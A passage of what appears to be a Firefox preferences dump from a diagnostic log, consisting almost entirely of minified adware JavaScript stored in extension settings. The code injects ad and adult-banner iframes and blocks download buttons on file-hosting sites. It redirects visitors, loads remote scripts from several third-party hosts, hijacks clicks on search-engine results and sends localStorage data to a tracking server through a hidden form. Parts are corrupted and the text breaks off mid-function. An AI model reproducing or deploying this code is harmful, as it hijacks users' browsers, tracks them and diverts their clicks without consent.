function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [394,size]);}}catch(e){return !1;}},excite_US_tbgen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 160x600 300x250'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2020811\",\"300x250\":\"2020807\",\"160x600\":\"2020808\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [395,size]);}}catch(e){return !1;}},media888_gen:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2025564\",\"300x250\":\"2025606\",\"160x600\":\"2025613\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [398,size]);}}catch(e){return !1;}},dsnr_t2_streaming:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...996&size= size ' (atp?atp:1), [387,size]);}}catch(e){return !1;}},dsnr_t1_streaming:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt...995&size= size ' (atp?atp:1), [388,size]);}}catch(e){return !1;}},cpx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://Servedby.bigf...size &referrer=' (atp?atp:1), [389,size]);}}catch(e){return !1;}},adstract_adk2_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600 120x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;;return function(ifr){_zyad.iset(ifr, 'http://cdn.adk2.com/...ize= size &ci=1' (atp?atp:1), [390,size]);}}catch(e){return !1;}},mari_media_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;var arr={\"728x90\":\"1975837\",\"300x250\":\"1975841\",\"468x60\":\"1975842\",\"120x600\":\"1975845\",\"160x600\":\"1975843\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [399,size]);}}catch(e){return !1;}},adstract_apx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2024075\",\"300x250\":\"2024068\",\"468x60\":\"2024077\",\"160x600\":\"2024076\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [392,size]);}}catch(e){return !1;}},say_media_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1965839\",\"300x250\":\"1965822\",\"468x60\":\"1965841\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [400,size]);}}catch(e){return !1;}},darrieans_apx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;var arr={\"728x90\":\"2030668\",\"300x250\":\"2030667\",\"468x60\":\"2031775\",\"120x600\":\"2031774\",\"160x600\":\"2030645\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=&referrer=&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [401,size]);}}catch(e){return !1;}},baba_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return false;var arr={\"728x90\":\"1962252\",\"300x250\":\"1962229\",\"468x60\":\"1962256\",\"120x600\":\"1962254\",\"160x600\":\"1962253\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [402,size]);}}catch(e){return !1;}},matomy_apx_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2030901\",\"300x250\":\"2030945\",\"160x600\":\"2030947\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&position=above\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [403,size]);}}catch(e){return !1;}},matomy_adk2_strm:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://creative.m2pu...ntext=c19951074' (atp?atp:1), [404,size]);}}catch(e){return !1;}},liveJasmine:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x60 120x600 125x125 428x60 600x400 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;var url = '';switch(size){case \"120x60\":url=' <a title=\"Adult chat rooms 24/7\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_15251\" align=\"center\" target=\"_blank\"> <img alt=\"Adult chat rooms 24/7\" src=\"http://static.awempire.com/ban/120x60/120x60_1.gif\" border=\"0\" /> </a>';break;case \"120x600\":url=' <a title=\"Free adult video chat\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_15918\" align=\"center\" target=\"_blank\"> <img alt=\"Free adult video chat\" src=\"http://static.awempire.com/ban/120x600/120x600_32.gif\" border=\"0\" /> </a>';\nbreak;case \"125x125\":url=' <a title=\"Free adult video chat\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_16016\" align=\"center\" target=\"_blank\"> <img alt=\"Free adult video chat\" src=\"http://static.awempire.com/ban/125x125/125x125_3.gif\" border=\"0\" /> </a>';break;case \"600x400\":url=' <a title=\"Live sex webcam models\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_39725\" align=\"center\" target=\"_blank\"> <img alt=\"Live sex webcam models\" src=\"http://static.awempire.com/ban/600x400/600x400_1.jpg\" border=\"0\" /> </a>';\nbreak;case \"300x250\":url=' <a title=\"Free live sex video\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_16947\" align=\"center\" target=\"_blank\"> <img alt=\"Free live sex video\" src=\"http://static.awempire.com/ban/300x250/300x250_1.gif\" border=\"0\" /> </a>';break;case \"468x60\":url=' <a title=\"Adult chat rooms 24/7\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_15580\" align=\"center\" target=\"_blank\"> <img alt=\"Adult chat rooms 24/7\" src=\"http://static.awempire.com/ban/468x60/468x60_275.gif\" border=\"0\" /> </a>';\nbreak;case \"728x90\":url='<a title=\"Join for free\" href=\"http://www.livejasmin.com/listpage.php?psid=admaven&psprogram=revs&pstool=1_15188\" align=\"center\" target=\"_blank\"> <img alt=\"Join for free\" src=\"http://static.awempire.com/ban/728x90/728x90_142.gif\" border=\"0\" /> </a>'};;return function(ifr){_zyad.iset(ifr, ''+url+'', (atp?atp:4), [52,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"7oGn8Dlf=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"7oGn8Dlf=\")){var d=a.match(/7oGn8Dlf=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9HrdYMCyVUojwFpdsMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0pdw4qTYHpjr8rjU9qjr8rjU8pa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){location.href=\"http://yt.jobfindgold.info/e/?eid=308&hid=8196839351945351958&pid=1182&ch=99&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))}})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B2A47DBFD-567F-4159-AD6A-B0D9CF6CCDFC%7D:2.0
FF - prefs.js..extensions.enabledAddons: %7B8f02605d-be4e-41ba-bd00-c39a59c46919%7D:10.22.5.10
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:24.0
FF - prefs.js..extensions.zg1A.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top && !document.getElementById('sjsjszmzmaw28aj6')){var script=document.createElement('script'script.type='text/javascript';script.setAttribute('id','sjsjszmzmaw28aj6');script.src='//static.getjs.net/sd/1018/1012.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src=window.self.location.protocol=='https:' ? '//i_sfkpjs_info.tlscdn.com/dnkp/javascript.js?channel=p1182&hid=0' : '//i.sfkpjs.info/sfkp/javascript.js?channel=p1182&hid=0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=sfkp&userId=2556466782069057220&CTID=p1182';document.getElementsByTagName(\"head\")[0].appendChild(script);};if (window.self.location.protocol.indexOf('http') > -1 && window.self == window.top){var script = document.createElement('script');script.type = 'text/javascript';script.src = '//lb-betty-598702759.us-east-1.elb.amazonaws.com/xuiow/?s=PT1311FA&pid=2934&z=1&g=1 ';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"https://smartsuggestor.net/smarts/js/suggest-10070.js\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=2';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.3\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\", validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:\"#sb_form_q\",validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\", \"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\", unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop= \"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c= function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,b.utils.waitForElement(this.src_for_keyword,function(){var c=document.getElementById(\"omnibox\");\"0px\"!=getComputedStyle(c,null).right&&a()}))}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c, b,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var c=0;c<a.cache.length;c++)a.remove.apply(a,a.cache[c]);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange= function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;if(25<b.waitForElementCounter)return d(null);if(\"undefined\"== typeof g||1>g.length){if(a[f])return d(null);var k=arguments.callee;setTimeout(function(){b.waitForElementCounter++;k(c,d,e,f)},e)}else{if(a[f])return d(null);b.waitForElementCounter=0;return d(g)}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!= typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText= a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a= a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"== d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"== f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref= function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a= a.replace(/\\\"/g,'\\\\\"');return 